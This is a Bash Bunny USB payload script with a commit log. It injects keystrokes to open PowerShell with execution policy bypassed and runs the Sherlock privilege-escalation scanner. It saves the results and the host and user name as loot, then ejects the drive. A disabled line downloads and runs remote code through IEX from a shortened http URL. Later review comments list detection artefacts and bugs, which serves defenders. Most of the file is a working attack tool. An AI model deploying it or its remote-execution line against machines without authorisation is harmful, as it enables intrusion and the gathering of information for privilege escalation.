illwill 147a71fe4f Added browsercreds, wificreds, and mrrobot payloads (#114)
* Initial commit

HID Powershell attack to dump WiFiCreds

* Update readme.md

* changed initial LED blink color to white

* Changed initial LED color to white

* Changed initial LED Color to white

* swapped sync before LED

* switched from powershell to batch

* Update payload.txt

* using powershell again , updated version and LEDs

* using powershell, added usb eject,  Win 7,8,10

* added window resizing to hide payload typing

* Update payload.txt

* pull request

* BrowserCreds Pull

* separate powershell script called from payload

also added result detection

* update LEDs

* Update payload.txt

* initial commit

* Update payload.txt

* initial pull

* initial commit
2017-04-07 15:48:20 +10:00


#!/bin/bash
#
# Title: PrivEscChecker
# Author: illwill
# Version: 0.1
#
# Check Windows box for unpatched vulns that allow privilege escalation
# then stashes them in /root/udisk/loot/PrivEscChecker/%ComputerName%-%username%
# Can be used locally or webdls the script from github
# Credits to rasta-mouse for their powershell script:
# https://github.com/rasta-mouse/Sherlock Sherlock.ps1
#
# How it works (Bash Bunny payload, runs on the Bunny, not on the host):
#   1. present as a keyboard (HID) plus a mass-storage volume labelled "BashBunny"
#   2. type a PowerShell session via Win+R that locates the Bunny drive letter,
#      runs Sherlock's Find-AllVulns, writes OUTPUT.txt and a DONE marker to the
#      Bunny's loot share, then ejects the volume
#   3. back on the Bunny: wait for DONE, file the output under a per-host folder
#      and signal the result on the LED
#
# Artifacts this leaves on the host that a defender can look for: a new HID
# keyboard and removable volume with label "BashBunny", a Win+R launch of
# POWERSHELL, and a child powershell started with -NoProfile -ExecutionPolicy
# Bypass that imports Sherlock.ps1 from the removable drive.
#
# Blue...............Running Script
# Purple.............Checking Results
# Green..............Found Possible Privilege Escalation
# Red................No Possible Privilege Escalation
# (Red is also shown briefly during setup, before the legend applies.)
#
# Source bunny_helpers.sh to get environment variable SWITCH_POSITION
source bunny_helpers.sh
# Initial LED while setting up; the numeric argument presumably is a blink
# rate — see bunny_helpers.sh / the Bunny LED docs to confirm.
LED R 200
# Loot lands on the Bunny's own storage; this path is also what the host sees
# as <drive>:\loot\PrivEscChecker once the volume is mounted.
LOOTDIR=/root/udisk/loot/PrivEscChecker
mkdir -p $LOOTDIR
#cleanup any prior unfinished payloads
# No `set -e` here, so a missing file just prints an error and continues.
rm $LOOTDIR/DONE
# NOTE(review): the file written by the host further down is OUTPUT.txt, not
# OUTPUT, so this line does not remove a leftover result from a previous run.
rm $LOOTDIR/OUTPUT
# Keyboard + mass storage at the same time: keystrokes below refer to the
# storage volume by its label.
ATTACKMODE HID STORAGE
LED B 200
# wait 6 seconds for the storage to popup, then open powershell and get bunny drive letter
Q DELAY 6000
Q GUI r
Q DELAY 100
Q STRING POWERSHELL
Q ENTER
Q DELAY 500
# The backslashes are bash escapes on the Bunny side, so the host receives the
# literal text:
#   $Bunny = (gwmi win32_volume -f 'label=''BashBunny''' | Select-Object -ExpandProperty DriveLetter)
# i.e. the drive letter of the volume labelled BashBunny.
Q STRING \$Bunny \= \(gwmi win32_volume -f \'label\=\'\'BashBunny\'\'\' \| Select-Object -ExpandProperty DriveLetter\)
Q ENTER
Q DELAY 100
########################################################################################################################
# Check for missing Windows update patches either by downloading or use local file (comment local and uncomment webdl) #
########################################################################################################################
# LOCAL FROM BUNNY
# Starts a child powershell (-NoProfile -ExecutionPolicy Bypass) that imports
# Sherlock.ps1 from the Bunny's payload folder for the current switch position
# and writes Find-AllVulns output to loot\PrivEscChecker\OUTPUT.txt on the
# Bunny volume. ${SWITCH_POSITION} is expanded on the Bunny before typing;
# $Bunny is expanded by the host's outer PowerShell session inside the
# double-quoted -Command string, so the child sees the resolved drive letter.
Q STRING PowerShell -NoProfile -ExecutionPolicy Bypass -Command \"\& \{Import-Module -Name \$Bunny\\payloads\\${SWITCH_POSITION}\\Sherlock.ps1\; Find-AllVulns \| Out-File \$Bunny\\loot\\PrivEscChecker\\OUTPUT.txt\}\"
# WEBDL FROM INTERNET
# Disabled by default. NOTE(review): this variant fetches and IEX-executes
# code over plain http through a URL shortener, so whatever the shortener
# resolves to at run time is what gets executed — there is no integrity check
# on the downloaded script. The local copy above avoids that dependency.
# Q STRING IEX \(New-Object Net.WebClient\).DownloadString\(\'http:\/\/bit.ly\/2nS1L45\'\)\; Find-AllVulns \| Out-File \$Bunny\\loot\\PrivEscChecker\\OUTPUT.txt
Q ENTER
Q DELAY 100
# Create a file called DONE with %ComputerName%-%username%
# DONE doubles as the completion signal for the wait loop on the Bunny and as
# the name of the per-host loot folder.
Q STRING New-Item \$Bunny\\loot\\PrivEscChecker\\DONE -type file -force -value \$env:computername-\$env:username
Q ENTER
Q DELAY 100
# Eject the USB Safely
# NameSpace(17) is the "My Computer" shell folder; ParseName($Bunny) picks the
# Bunny drive and InvokeVerb("Eject") dismounts it so the Bunny can remount
# the volume locally.
Q STRING \$Eject \= New-Object -comObject Shell.Application
Q ENTER
Q DELAY 100
Q STRING \$Eject.NameSpace\(17\).ParseName\(\$Bunny\).InvokeVerb\(\"Eject\"\)
Q ENTER
# Close the typed PowerShell session.
Q STRING exit
Q ENTER
# Flush the Bunny's filesystem before reading back what the host wrote.
sync
#remount the drive and check results
# Purple (R+B) = "Checking Results" per the legend above.
LED R B 200
sleep 1
# Wait for the DONE file to be created so we know powershell is finished
# LOOTDIR is reassigned here with the same value it was given above.
LOOTDIR=/root/udisk/loot/PrivEscChecker
DONEFILE=$LOOTDIR/DONE
# NOTE(review): there is no timeout — if the host never writes DONE (Run
# dialog did not open, volume not detected, PowerShell blocked) this loop
# spins for ever and the LED stays purple.
while [ ! -e $DONEFILE ]; do sleep .5; done;
sleep 1
# cat %ComputerName%-%username% from DONE as a variable to name folder and then delete
# NOTE(review): DIR is data written by the target host, used unquoted as a
# path component below; a value containing whitespace, "/" or ".." would
# make mkdir/mv operate on an unintended path on the Bunny. Treat it as
# untrusted input.
DIR=`cat $DONEFILE`
mkdir $LOOTDIR/$DIR
mv $LOOTDIR/OUTPUT.txt $LOOTDIR/$DIR/OUTPUT.txt
rm -f $DONEFILE
# Check OUTPUT.txt for any missing patches
# Only the exit status of grep is used here; -l (print file name) is
# redundant next to -q and has no visible effect.
if grep -lq 'Appears Vulnerable' $LOOTDIR/$DIR/OUTPUT.txt; then
LED G 200
else
# No numeric argument here, unlike the other LED calls — presumably solid
# rather than blinking; confirm against bunny_helpers.sh.
LED R
fi